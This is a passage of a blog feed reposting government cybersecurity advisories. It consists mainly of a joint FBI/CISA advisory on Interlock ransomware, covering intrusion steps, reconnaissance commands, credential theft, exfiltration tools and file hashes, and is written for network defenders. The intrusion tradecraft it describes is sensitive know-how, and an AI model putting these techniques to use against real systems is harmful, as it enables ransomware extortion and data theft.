<td>Malicious actors could systematically guess possible passwords.</td>
</tr>
<tr>
<td>Brute Force: Password Cracking</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1110/002/" target="_blank" title="T1110.002">T1110.002</a></td>
<td>Malicious actors could recover plaintext credentials after obtaining password hashes or other similar credential material.</td>
</tr>
<tr>
<td>Brute Force: Password Spraying</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1110/003/" target="_blank" title="T1110.003">T1110.003</a></td>
<td>Malicious actors could attempt to use a common password against different accounts to try to obtain account access.&nbsp;</td>
</tr>
<tr>
<td>Brute Force: Credential Stuffing</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1110/004/" target="_blank" title="T1110.004">T1110.004</a></td>
<td>Malicious actors could try to use credentials gained from an unrelated account to gain access to a desired account in the victim’s environment.&nbsp;</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 7: Discovery</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>System Network Connections Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1049/" target="_blank" title="T1049">T1049</a></td>
<td>Malicious actors could map network connections to identify paths to OT systems from an unsecured IT workstation with access to the OT network.&nbsp;</td>
</tr>
<tr>
<td>System Network Configuration Discovery</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1016/" target="_blank" title="T1016">T1016</a></td>
<td>Malicious actors could use an unsecured workstation to discover network configurations.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 8: Lateral Movement</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Remote Services: Remote Desktop Protocol</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1021/001/" target="_blank" title="T1021.001">T1021.001</a></td>
<td>Malicious actors could use valid credentials to establish an RDP connection to access a workstation.&nbsp;</td>
</tr>
<tr>
<td>Remote Services: SSH</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1021/004/" target="_blank" title="T1021.004">T1021.004</a></td>
<td>Malicious actors could use valid accounts to establish an SSH connection to a workstation.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table&nbsp;9: Command and Control</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Application Layer Protocol</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1071/" target="_blank" title="T1071">T1071</a></td>
<td>Malicious actors could use application layer protocols to communicate with systems they compromised while blending in with existing network traffic.&nbsp;</td>
</tr>
</tbody>
</table>
</div>
<div>
<hr />
<div>
<p><sup>[</sup><a class="ck-anchor" id="_ftnref1"><sup>1</sup></a><sup>]</sup> While CISA used PowerShell to review these configuration settings, they can also be identified by running a search in any text editor.<br /><sup>[</sup><a class="ck-anchor" id="_ftnref2"><sup>2</sup></a><sup>]</sup> For more information, see <a href="https://learn.microsoft.com/en-us/windows/win32/com/schannel" target="_blank" title="Schannel – Microsoft Learn">Schannel – Microsoft Learn</a>.<br /><sup>[</sup><a class="ck-anchor" id="_ftnref3"><sup>3</sup></a><sup>]</sup> Reference the Purdue Model for ICS Security as a guide for layered security zones and assess compliance with <a href="https://www.isa.org/standards-and-publications/isa-standards/isa-iec-62443-series-of-standards" target="_blank" title="IEC 62443">IEC 62443</a> network and system security standards; organizations may use this version of the model developed by Department of Energy (DOE) as a guide: <a href="https://www.energy.gov/sites/default/files/2022-10/Infra_Topic_Paper_4-14_FINAL.pdf" target="_blank" title="Purdue Model Framework for Industrial Control Systems &amp; Cybersecurity Segmentation">Purdue Model Framework for Industrial Control Systems &amp; Cybersecurity Segmentation</a>.</p>
</div>
</div>
<p>Source: US-CERT Alerts</p>
]]></content:encoded>
			<wfw:commentRss>http://disensogroup.com/cisa-and-uscg-identify-areas-for-cyber-hygiene-improvement-after-conducting-proactive-threat-hunt-at-us-critical-infrastructure-organization/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>#StopRansomware: Interlock</title>
		<link>http://disensogroup.com/stopransomware-interlock/</link>
		<comments>http://disensogroup.com/stopransomware-interlock/#comments</comments>
		<pubDate>Mon, 21 Jul 2025 14:11:24 +0000</pubDate>
		<dc:creator><![CDATA[pdisenso]]></dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[aside format]]></category>

		<guid isPermaLink="false">http://disensogroup.com/stopransomware-interlock/</guid>
		<description><![CDATA[Summary Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to...]]></description>
				<content:encoded><![CDATA[<h2><strong>Summary</strong></h2>
<p><em><strong>Note</strong>: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit </em><a href="https://www.cisa.gov/stopransomware/stopransomware" target="_blank" title="#StopRansomware"><em>stopransomware.gov</em></a><em> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>
<p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC)—hereafter referred to as “the authoring organizations”—are releasing this joint advisory to disseminate known Interlock ransomware IOCs and TTPs identified through FBI investigations (as recently as June 2025) and trusted third-party reporting.</p>
<p>The Interlock ransomware variant was first observed in late September 2024, targeting various business, critical infrastructure, and other organizations in North America and Europe. FBI maintains these actors target their victims based on opportunity, and their activity is financially motivated. FBI is aware of Interlock ransomware encryptors designed for both Windows and Linux operating systems; these encryptors have been observed encrypting virtual machines (VMs) across both operating systems. FBI observed actors obtaining initial access via drive-by download from compromised legitimate websites, which is an uncommon method among ransomware groups. Actors were also observed using the ClickFix social engineering technique for initial access, in which victims are tricked into executing a malicious payload under the guise of fixing an issue on the victim’s system. Actors then use various methods for discovery, credential access, and lateral movement to spread to other systems on the network.</p>
<p>Interlock actors employ a double extortion model in which actors encrypt systems after exfiltrating data, which increases pressure on victims to pay the ransom to both get their data decrypted and prevent it from being leaked.&nbsp;</p>
<p>FBI, CISA, HHS, and MS-ISAC encourage organizations to implement the recommendations in the <strong>Mitigations</strong> section of this advisory to reduce the likelihood and impact of Interlock ransomware incidents.</p>
<p>Download the PDF version of this report:</p>
<div class="c-file">
<div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-07/aa25-203a-stopransomware-interlock-072225.pdf" class="c-file__link" target="_blank">AA25 203A StopRansomware Interlock</a><br />
    <span class="c-file__size">(PDF,       727.00 KB<br />
  )</span>
  </div>
</div>
<p>For a downloadable copy of IOCs, see:</p>
<div class="c-file">
<div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-07/AA25-203A-interlock-stix.xml" class="c-file__link" target="_blank">AA25-203A Interlock STIX XML</a><br />
    <span class="c-file__size">(XML,       63.69 KB<br />
  )</span>
  </div>
</div>
<div class="c-file">
<div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2025-07/AA25-203A-interlock-stix.json" class="c-file__link" target="_blank">AA25 203A Interlock STIX JSON</a><br />
    <span class="c-file__size">(JSON,       57.47 KB<br />
  )</span>
  </div>
</div>
<h2><a class="ck-anchor" id="technical-details"><strong>Technical Details</strong></a></h2>
<p><strong>Note</strong>: This advisory uses the <a href="https://attack.mitre.org/versions/v17/matrices/enterprise/" target="_blank" title="MITRE ATT&amp;CK Matrix for Enterprises">MITRE ATT&amp;CK® Matrix for Enterprise</a> framework, version 17. See the <strong>MITRE ATT&amp;CK Tactics and Techniques</strong> section of this advisory for tables mapped to the threat actors’ activity.</p>
<h3><a class="ck-anchor" id="overview">Overview</a></h3>
<p>Since September 2024, Interlock ransomware actors have impacted a wide range of businesses and critical infrastructure sectors in North America and Europe. These actors are opportunistic and financially motivated in nature and employ tactics to infiltrate and disrupt the victim’s ability to provide their essential services.&nbsp;</p>
<p>Interlock actors leverage a double extortion model, in which they both encrypt and exfiltrate victim data. Ransom notes do not include an initial ransom demand or payment instructions; instead, victims are provided with a unique code and are instructed to contact the ransomware group via a <code>.onion</code> URL through the Tor browser. To date, Interlock actors have been observed encrypting VMs, leaving hosts, workstations, and physical servers unaffected; however, this does not mean they will not expand to these systems in the future. To counter Interlock actors’ threat to VMs, enterprise defenders should implement robust endpoint detection and response (EDR) tooling and capabilities.</p>
<p>The authoring agencies are aware of emerging open-source reporting detailing similarities between the Rhysida and Interlock ransomware variants.<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note1"><sup>1</sup></a> For additional information on Rhysida ransomware, see the joint advisory, <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a" title="#StopRansomware: Rhysida Ransomware">#StopRansomware: Rhy</a><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a#StopRansomware:" title="#StopRansomware: Rhysida Ransomware">sida Ransomware</a><a href="">.</a></p>
<h3><a class="ck-anchor" id="initial-access">Initial Access</a></h3>
<p>FBI has observed Interlock actors obtaining initial access [<a href="https://attack.mitre.org/versions/v17/tactics/TA0001/" target="_blank">TA0001</a>] via drive-by download [<a href="https://attack.mitre.org/versions/v17/techniques/T1189/" target="_blank">T1189</a>] from compromised legitimate websites, an atypical method for ransomware actors. Interlock ransomware methods for initial access have previously disguised malicious payloads as fake Google Chrome or Microsoft Edge browser updates, though a cybersecurity company recently reported a shift to payload filenames masquerading as updates for common security software (see Table 5 for a list of filenames).<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note2"><sup>2</sup></a></p>
<p>In some instances, FBI has observed Interlock actors using the ClickFix social engineering technique, in which unsuspecting users are prompted to execute a malicious payload by clicking a fake Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) [<a href="https://attack.mitre.org/versions/v17/techniques/T1189/" target="_blank">T1189</a>]. The CAPTCHA contains instructions for users to open the Windows Run window, paste the clipboard contents, and then execute a malicious Base64-encoded PowerShell process [<a href="https://attack.mitre.org/versions/v17/techniques/T1204/004/" target="_blank">T1204.004</a>].<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note3"><sup>3</sup></a></p>
<p><strong>Note</strong>: This ClickFix technique has been used in several other malware campaigns, including Lumma Stealer and DarkGate.<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note4"><sup>4</sup></a></p>
<h3><a class="ck-anchor" id="execution-and-persistence">Execution and Persistence</a></h3>
<p>Based on FBI investigations, the fake Google Chrome browser executable functions as a remote access trojan (RAT) [<a href="https://attack.mitre.org/versions/v17/techniques/T1105/" target="_blank">T1105</a>] designed to execute a PowerShell script [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/001/" target="_blank">T1059.001</a>] that drops a file into the Windows Startup folder. From there, the file is designed to run the RAT every time the victim logs in [<a href="https://attack.mitre.org/versions/v17/techniques/T1547/001/" target="_blank">T1547.001</a>], establishing persistence [<a href="https://attack.mitre.org/versions/v17/tactics/TA0003/" target="_blank">TA0003</a>].&nbsp;</p>
<p>FBI also observed instances in which Interlock actors executed a PowerShell command designed to establish persistence via a Windows Registry key modification [<a href="https://attack.mitre.org/versions/v17/techniques/T1547/001/" target="_blank">T1547.001</a>]. To do so, Interlock actors used a PowerShell command [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/001/" target="_blank">T1059.001</a>] designed to add a run key value named “Chrome Updater” [<a href="https://attack.mitre.org/versions/v17/techniques/T1036/005/" target="_blank">T1036.005</a>] that uses a specific log file as an argument upon user login.</p>
<h3><a class="ck-anchor" id="reconnaissance">Reconnaissance</a></h3>
<p>To facilitate reconnaissance, a PowerShell script executes a series of commands [<a href="https://attack.mitre.org/versions/v17/techniques/T1059/001/" target="_blank">T1059.001</a>] designed to gather information on victim machines (see <strong>Table 1</strong>).</p>
<table class="tablesaw tablesaw-stack">
<caption>Table 1. PowerShell Commands for Reconnaissance</caption>
<thead>
<tr>
<th role="columnheader">PowerShell Command</th>
<th role="columnheader">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>WindowsIdentity.GetCurrent()</td>
<td>Returns a WindowsIdentity object that represents the current Windows user [<a href="https://attack.mitre.org/versions/v17/techniques/T1033/" target="_blank">T1033</a>].</td>
</tr>
<tr>
<td>systeminfo</td>
<td>Displays detailed configuration information [<a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank">T1082</a>] about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties.</td>
</tr>
<tr>
<td>tasklist/svc</td>
<td>Lists unabridged service information [<a href="https://attack.mitre.org/versions/v17/techniques/T1007/" target="_blank">T1007</a>] for each process currently running on the local computer.</td>
</tr>
<tr>
<td>Get-Service</td>
<td>Gets objects that represent the services [<a href="https://attack.mitre.org/versions/v17/techniques/T1007/" target="_blank">T1007</a>] on a computer, including running and stopped services.</td>
</tr>
<tr>
<td>Get-PSDrive</td>
<td>
<p>Gets the drives [<a href="https://attack.mitre.org/versions/v17/techniques/T1082/" target="_blank">T1082</a>] in the current session, such as:</p>
<ul>
<li>Windows logical drives on the computer, including drives mapped to network shares.</li>
<li>Drives exposed by PowerShell providers.</li>
<li>Session-specified temporary drives and persistent mapped network drives.<br />&nbsp;</li>
</ul>
</td>
</tr>
<tr>
<td>arp -a</td>
<td>Displays and modifies entries in the Address Resolution Protocol (ARP) cache table [<a href="https://attack.mitre.org/versions/v17/techniques/T1016/" target="_blank">T1016</a>], which contains entries on the IPv4 and IPv6 addresses on host endpoints.</td>
</tr>
</tbody>
</table>
<h3><a class="ck-anchor" id="command-and-control">Command and Control</a></h3>
<p>FBI observed Interlock actors using command and control (C2) [<a href="https://attack.mitre.org/versions/v17/tactics/TA0011/" target="_blank">TA0011</a>] applications like <a href="https://attack.mitre.org/versions/v17/software/S0154/" target="_blank">Cobalt Strike</a> and SystemBC. Interlock actors also used Interlock RAT<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note5"><sup>5</sup></a> and NodeSnake RAT (as of March 2025)<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note6"><sup>6</sup></a> for C2 and executing commands.</p>
<h3><a class="ck-anchor" id="credential-access">Credential Access, Lateral Movement, and Privilege Escalation</a></h3>
<p>FBI observed that once Interlock actors establish remote control of a compromised system, they use a series of PowerShell commands to download a credential stealer (<code>cht.exe</code>) [<a href="https://attack.mitre.org/versions/v17/tactics/TA0006/" target="_blank">TA0006</a>] and keylogger binary (<code>klg.dll</code>) [<a href="https://attack.mitre.org/versions/v17/techniques/T1056/001/" target="_blank">T1056.001</a>],[<a href="https://attack.mitre.org/versions/v17/techniques/T1105/" target="_blank">T1105</a>]. According to open source reporting, the credential stealer collects login information and associated URLs for victims’ online accounts [<a href="https://attack.mitre.org/versions/v17/techniques/T1555/003/" target="_blank">T1555.003</a>], while the keylogger dynamic link library (DLL) logs users’ keystrokes in a file named <code>conhost.txt</code> [<a href="https://attack.mitre.org/versions/v17/techniques/T1036/005/" target="_blank">T1036.005</a>].<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note7"><sup>7</sup></a> As of February 2025, private cybersecurity analysts also observed Interlock ransomware infections executing different versions of information stealers [<a href="https://attack.mitre.org/versions/v17/tactics/TA0006/" target="_blank">TA0006</a>], including Lumma Stealer<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note8"><sup>8</sup></a> and Berserk Stealer, to harvest credentials for lateral movement and privilege escalation [<a href="https://attack.mitre.org/versions/v17/techniques/T1078/" target="_blank">T1078</a>].<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note9"><sup>9</sup></a></p>
<p>Interlock actors leverage compromised credentials and Remote Desktop Protocol (RDP)<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note10"><sup>10</sup></a> [<a href="https://attack.mitre.org/versions/v17/techniques/T1021/001/" target="_blank">T1021.001</a>] to move between systems. They also use tools like AnyDesk to enable remote connectivity and PuTTY to assist with lateral movement [<a href="https://attack.mitre.org/versions/v17/techniques/T1219/" target="_blank">T1219</a>].<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note11"><sup>11</sup></a> In addition to stealing users’ online credentials, Interlock actors have compromised domain administrator accounts (possibly by using a Kerberoasting attack [<a href="https://attack.mitre.org/versions/v17/techniques/T1558/003/" target="_blank">T1558.003</a>])<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note12"><sup>12</sup></a> to gain additional privileges [<a href="https://attack.mitre.org/versions/v17/techniques/T1078/002/" target="_blank">T1078.002</a>].&nbsp;</p>
<h3><a class="ck-anchor" id="collection-and-exfiltration">Collection and Exfiltration</a></h3>
<p>Interlock actors leverage Azure Storage Explorer (<code>StorageExplorer.exe</code>) to navigate victims’ Microsoft Azure Storage accounts [<a href="https://attack.mitre.org/versions/v17/techniques/T1530/" target="_blank">T1530</a>] prior to exfiltrating data. According to open source reporting, Interlock actors execute AzCopy to exfiltrate data by uploading it to the Azure storage blob [<a href="https://attack.mitre.org/versions/v17/techniques/T1567/002/" target="_blank">T1567.002</a>].<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note13"><sup>13</sup></a> Interlock actors also exfiltrate data over file transfer tools, including WinSCP [<a href="https://attack.mitre.org/versions/v17/techniques/T1048/" target="_blank">T1048</a>].</p>
<h3><a class="ck-anchor" id="impact">Impact</a></h3>
<p>Following data exfiltration, Interlock actors deploy the encryption binary as a 64-bit executable named <code>conhost.exe</code> [<a href="https://attack.mitre.org/versions/v17/techniques/T1486/" target="_blank">T1486</a>],[<a href="https://attack.mitre.org/versions/v17/techniques/T1036/005/" target="_blank">T1036.005</a>]. FBI has observed Interlock ransomware encryptors for both Windows and Linux operating systems. Encryptors are designed to encrypt files using a combined Advanced Encryption Standard (AES) and Rivest-Shamir-Adleman (RSA) algorithm. In addition, cybersecurity researchers have identified Interlock ransomware samples using a FreeBSD ELF encryptor [<a href="https://attack.mitre.org/versions/v17/techniques/T1486/" target="_blank">T1486</a>], a departure from usual Linux encryptors designed for VMware ESXi servers and VMs.<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note14"><sup>14</sup></a></p>
<p>A cybersecurity company identified a DLL binary named <code>tmp41.wasd</code>—executed after encryption using <code>rundll32.exe</code> [<a href="https://attack.mitre.org/versions/v17/techniques/T1218/011/" target="_blank">T1218.011</a>]—which uses the <code>remove()</code> function to delete the encryption binary [<a href="https://attack.mitre.org/versions/v17/techniques/T1070/004/" target="_blank">T1070.004</a>];<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note15"><sup>15</sup></a> on Linux machines, the encryptor uses a similar technique to execute the <code>removeme</code> function.&nbsp;</p>
<p>Encrypted files are appended with either <code>a .interlock</code> or <code>.1nt3rlock</code> file extension, alongside a ransom note titled <code>!__README__!.txt</code> delivered via group policy object (GPO). Interlock actors use a double-extortion model [<a href="https://attack.mitre.org/versions/v17/techniques/T1657/" target="_blank">T1657</a>], encrypting systems after exfiltrating data. The ransom note provides each victim with a unique code and instructions to contact the ransomware actors via a <code>.onion</code> URL.&nbsp;</p>
<p>Interlock actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. The actors instruct victims to make ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the actors. The actors threaten to publish the victim’s exfiltrated data to their leak site on the Tor network unless the victim pays the ransom demand; the actors have previously followed through on this threat.<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a#note16"><sup>16</sup></a></p>
<h2><a class="ck-anchor" id="leveraged-tools"><strong>Leveraged Tools</strong></a></h2>
<p>See <strong>Table 2</strong> for publicly available tools and applications used by Interlock ransomware actors. This includes legitimate tools repurposed for their operations.</p>
<p><strong>Disclaimer</strong>: Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.</p>
<table class="tablesaw tablesaw-stack">
<caption>Table 2. Tools Used by Interlock Ransomware Actors</caption>
<thead>
<tr>
<th role="columnheader">Tool Name</th>
<th role="columnheader">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>AnyDesk</td>
<td>A common legitimate remote monitoring and management (RMM) tool maliciously used by Interlock actors to obtain remote access and maintain persistence. AnyDesk also supports remote file transfer.</td>
</tr>
<tr>
<td>Cobalt Strike</td>
<td>A penetration testing tool used by security professionals to test the security of networks and systems.</td>
</tr>
<tr>
<td>PowerShell</td>
<td>A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.</td>
</tr>
<tr>
<td>PSExec</td>
<td>A tool designed to run programs and execute commands on remote systems.</td>
</tr>
<tr>
<td>PuTTY.exe</td>
<td>An open source file transfer application commonly used to remotely connect to systems via Secure Shell (SSH). PuTTY also supports file transfer protocols like Secure File Transfer Protocol (SFTP) and Secure Copy Protocol (SCP).</td>
</tr>
<tr>
<td>ScreenConnect</td>
<td>A remote support, access, and meeting software that allows users to control devices remotely over the internet. CISA observed Interlock actors using a cracked version of this software in at least one incident. These versions may be standalone versions not connecting to ScreenConnect’s official cloud domains (domains available upon request from ConnectWise).</td>
</tr>
<tr>
<td>SystemBC</td>
<td>Enables Interlock actors to compromise systems, run commands, download malicious payloads, and act as a proxy tool to the actors’ C2 servers.</td>
</tr>
<tr>
<td>Windows Console Host</td>
<td>Windows Console Host (<code>conhost.exe</code>) manages the user interface for command-line applications in Windows, including Command Prompt and PowerShell.&nbsp;</td>
</tr>
<tr>
<td>WinSCP</td>
<td>A free and open source SSH File Transfer Protocol (FTP), WebDAV, Amazon S3, and secure copy protocol client.</td>
</tr>
</tbody>
</table>
<h2><a class="ck-anchor" id="leveraged-files"><strong>Leveraged Files</strong></a></h2>
<p>See <strong>Table 3</strong> and <strong>Table 4 </strong>for files used by Interlock ransomware actors. These were obtained from FBI investigations as recently as June 2025.</p>
<p><strong>Disclaimer</strong>: Some of the hashes are for legitimate tools and applications and should not be attributed as malicious without analytical evidence to support threat actor use and/or control. The authoring agencies recommend organizations investigate or vet these hashes prior to taking action, such as blocking.</p>
<table class="tablesaw tablesaw-stack">
<caption>Table 3. Files Used by Interlock Ransomware Actors (SHA-256)</caption>
<thead>
<tr>
<th role="columnheader">File Name</th>
<th role="columnheader">Hash</th>
</tr>
</thead>
<tbody>
<tr>
<td>1.ps1</td>
<td>fba4883bf4f73aa48a957d894051d78e0085ecc3170b1ff50e61ccec6aeee2cd&nbsp;</td>
</tr>
<tr>
<td>advanced_port_scanner.exe</td>
<td>4b036cc9930bb42454172f888b8fde1087797fc0c9d31ab546748bd2496bd3e5</td>
</tr>
<tr>
<td>Aisa.exe</td>
<td>18a507bf1c533aad8e6f2a2b023fbbcac02a477e8f05b095ee29b52b90d47421</td>
</tr>
<tr>
<td>AnyDesk.exe</td>
<td>1a70f4eef11fbecb721b9bab1c9ff43a8c4cd7b2cafef08c033c77070c6fe069</td>
</tr>
<tr>
<td>autoservice.dll</td>
<td>a4069aa29628e64ea63b4fb3e29d16dcc368c5add304358a47097eedafbbb565</td>
</tr>
<tr>
<td>Autostart.exe</td>
<td>d535bdc9970a3c6f7ebf0b229c695082a73eaeaf35a63cd8a0e7e6e3ceb22795</td>
</tr>
<tr>
<td>cht</td>
<td>FAFCD5404A992850FFCFFEE46221F9B2FF716006AECB637B80E5CD5AA112D79C</td>
</tr>
<tr>
<td>cht.exe</td>
<td>C20BABA26EBB596DE14B403B9F78DDC3C13CE9870EEA332476AC2C1DD582AA07</td>
</tr>
<tr>
<td>cleanup.dll (SystemBC)</td>
<td>1845a910dcde8c6e45ad2e0c48439e5ab8bbbeb731f2af11a1b7bbab3bfe0127</td>
</tr>
<tr>
<td>conhost</td>
<td>44887125aa2df864226421ee694d51e5535d8c6f70e327e9bcb366e43fd892c1</td>
</tr>
<tr>
<td>conhost.dll</td>
<td>a70af759e38219ca3a7f7645f3e103b13c9fb1db6d13b68f3d468b7987540ddf</td>
</tr>
<tr>
<td>conhost.dll</td>
<td>96babe53d6569ee3b4d8fc09c2a6557e49ebc2ed1b965abda0f7f51378557eb1</td>
</tr>
<tr>
<td>difxepi.dll (SystemBC)</td>
<td>1845a910dcde8c6e45ad2e0c48439e5ab8bbbeb731f2af11a1b7bbab3bfe0127</td>
</tr>
<tr>
<td>iexplore.exe</td>
<td>d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb</td>
</tr>
<tr>
<td>klg.dll</td>
<td>A4F0B68052E8DA9A80B70407A92400C6A5DEF19717E0240AC608612476E1137E</td>
</tr>
<tr>
<td>!!!OPEN_ME!!!.txt</td>
<td>68A49D5A097E3850F3BB572BAF2B75A8E158DADB70BADDC205C2628A9B660E7A</td>
</tr>
<tr>
<td>processhacker-2.39-bin.zip</td>
<td>88f26f3721076f74996f8518469d98bf9be0eaee5b9eccc72867ebfc25ea4e83</td>
</tr>
<tr>
<td>PsExec.exe</td>
<td>078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b</td>
</tr>
<tr>
<td>putty.exe</td>
<td>7a43789216ce242524e321d2222fa50820a532e29175e0a2e685459a19e09069</td>
</tr>
<tr>
<td>puttyportable.exe</td>
<td>97931d2e2e449ac3691eb526f6f60e2f828de89074bdac07bd7dbdfd51af9fa0</td>
</tr>
<tr>
<td>PuTTYPortable.zip</td>
<td>ff7ad2376ae01e4b3f1e1d7ae630f87b8262b5c11bc5d953e1ac34ffe81401b5</td>
</tr>
<tr>
<td>qrpce91.exe.asd</td>
<td>64a0ab00d90682b1807c5d7da1a4ae67cde4c5757fc7d995d8f126f0ec8ae983</td>
</tr>
<tr>
<td>ScreenConnect.ClientService.exe</td>
<td>2814b33ce81d2d2e528bb1ed4290d665569f112c9be54e65abca50c41314d462</td>
</tr>
<tr>
<td>SophosendpointAgent.exe</td>
<td>f51b3d054995803d04a754ea3ff7d31823fab654393e8054b227092580be43db</td>
</tr>
<tr>
<td>SophosScaner.exe</td>
<td>dfb5ba578b81f05593c047f2c822eeb03785aecffb1504dcb7f8357e898b5024</td>
</tr>
<tr>
<td>Starship.exe</td>
<td>94bf0aba5f9f32b9c35e8dfc70afd8a35621ed6ef084453dc1b10719ae72f8e2</td>
</tr>
<tr>
<td>start</td>
<td>28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f</td>
</tr>
<tr>
<td>start.exe</td>
<td>70bb799557da5ac4f18093decc60c96c13359e30f246683815a512d7f9824c8f</td>
</tr>
<tr>
<td>StorageExplorer.exe</td>
<td>73a9a1e38ff40908bcc15df2954246883dadfb991f3c74f6c514b4cffdabde66</td>
</tr>
<tr>
<td>Sysmon.sys</td>
<td>1d04e33009bcd017898b9e1387e40b5c04279c02ebc110f12e4a724ccdb9e4fb</td>
</tr>
<tr>
<td>upd_2327991.exe</td>
<td>7b9e12e3561285181634ab32015eb653ab5e5cfa157dd16cdd327104b258c332</td>
</tr>
<tr>
<td>webujgd.lnk</td>
<td>70EE22D394E107FBB807D86D187C216AD66B8537EDC67931559A8AEF18F6B5B3</td>
</tr>
<tr>
<td>WinSCP-6.3.5-Setup.exe</td>
<td>8eb7e3e8f3ee31d382359a8a232c984bdaa130584cad11683749026e5df1fdc3</td>
</tr>
<tr>
<td>Proxy Tool</td>
<td>e4d6fe517cdf3790dfa51c62457f5acd8cb961ab1f083de37b15fd2fddeb9b8f</td>
</tr>
<tr>
<td>Encryptor</td>
<td>e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1</td>
</tr>
<tr>
<td>Encryptor</td>
<td>c733d85f445004c9d6918f7c09a1e0d38a8f3b37ad825cd544b865dba36a1ba6</td>
</tr>
<tr>
<td>Encryptor</td>
<td>28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 4. Files Used by Interlock Ransomware Actors (SHA-1)</caption>
<thead>
<tr>
<th role="columnheader">File Name</th>
<th role="columnheader">Hash</th>
</tr>
</thead>
<tbody>
<tr>
<td>autorun.log</td>
<td>514946a8fc248de1ccf0dbeee2108a3b4d75b5f6</td>
</tr>
<tr>
<td>jar.jar</td>
<td>b625cc9e4024d09084e80a4a42ab7ccaa6afb61d</td>
</tr>
<tr>
<td>pack.jar</td>
<td>3703374c9622f74edc9c8e3a47a5d53007f7721e</td>
</tr>
</tbody>
</table>
<h2><a class="ck-anchor" id="mitre-attack-tactics-and-techniques"><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></a></h2>
<p>See <strong>Table 5</strong> through <strong>Table 16</strong> for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK® Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" target="_blank">Decider Tool</a>.</p>
